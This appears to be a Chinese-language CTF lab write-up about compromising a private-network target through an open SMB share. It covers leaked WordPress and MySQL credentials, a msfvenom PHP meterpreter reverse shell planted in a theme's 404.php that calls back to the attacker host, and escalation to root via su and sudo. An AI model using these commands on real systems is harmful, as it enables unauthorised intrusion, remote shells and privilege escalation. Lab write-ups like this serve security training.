【CTF】SMB服務資訊洩露
阿新 • • 發佈:2022-04-09
kali:192.168.223.131
target:192.168.223.168
通過arp-scan掃出ip為192.168.223.168,再通過nmap掃描
nmap -sV 192.168.223.168
通過nmap掃描,發現開放22、80,其中139和445都是Samba伺服器,3306是Mysql和6667埠
使用smbclient嘗試連線
smbclient -L 192.168.223.168
發現沒有密碼,有print$、share$、IPC$,嘗試連線share$
smbclient '\\192.168.223.168\share$'
直接Enter發現直接進去了,無密碼
看一下里面的deets.txt檔案
get deets.txt
開一個新終端開啟deets.txt,裡面找到密碼為12345
通過觀察smb伺服器發現有wordpress,推測是網站目錄,進入wordpress後找到wordpress的配置檔案
get wp-config.php
在新的終端開啟該檔案,為資料庫的連線檔案,找到賬號密碼為Admin和TogieMYSQL12345^^
到這裡沒什麼頭緒了,對網站進行目錄掃描
dirb http://192.168.223.168
掃出wordpress/wp-admin,嘗試用上面獲得的賬號密碼進行登陸,進入後臺,在Appearance的Editor裡面,發現可以編輯php檔案
通過msf生成php木馬,將其複製到對方的404頁面的php檔案中
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /shell.php
開啟監聽
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit
找到404頁面,通過安裝CMS獲得地址,並執行,此時目標上線
192.168.223.168/wordpress/wp-content/themes/twentyfifteen/404.php
美化一下介面並看一下使用者有哪些
python -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
找到有一個叫togie的使用者,在home目錄下,根據之前的deets.txt中獲得密碼進行提權
su togie
//12345
檢視使用者許可權發現是三個ALL,直接提權至root
sudo -l
sudo su
然後在root目錄下獲取目標檔案